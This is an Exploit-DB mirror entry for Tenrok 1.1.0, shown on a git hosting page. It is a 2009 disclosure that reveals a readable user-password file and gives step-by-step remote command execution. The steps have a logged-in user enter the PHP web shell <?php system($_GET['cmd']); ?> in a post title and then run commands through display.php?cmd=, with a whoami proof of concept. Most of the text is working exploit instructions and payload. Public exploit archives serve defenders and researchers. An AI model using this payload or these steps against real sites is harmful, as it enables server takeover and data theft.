bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/9367.txt
Offensive Security d304cc3d3e DB: 2017-11-24 
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

40 lines
No EOL
849 B
Text
Raw Blame History

#########################################################################
[+] Tenrok 1.1.0 (UDD/RCE) Multiple Remote Vulnerabilities
[+] Discovered By SirGod
[+] http://insecurity-ro.org
[+] http://h4cky0u.org
#########################################################################
[+] Homepage : http://tenrok.com/
[+] Users Data Disclosure
- PoC
http://127.0.0.1/userpwd.txt
[+] Remote Command Execution
- Must be logged in.
- Go to
http://127.0.0.1/post.php
in the Title field write :
<?php system($_GET['cmd']); ?>
then go to
http://127.0.0.1/display.php?cmd=[YOUR COMMAND]
and execute your commands.
- PoC
http://127.0.0.1/display.php?cmd=whoami
#########################################################################
# milw0rm.com [2009-08-05]
Reference in a new issue View git blame Copy permalink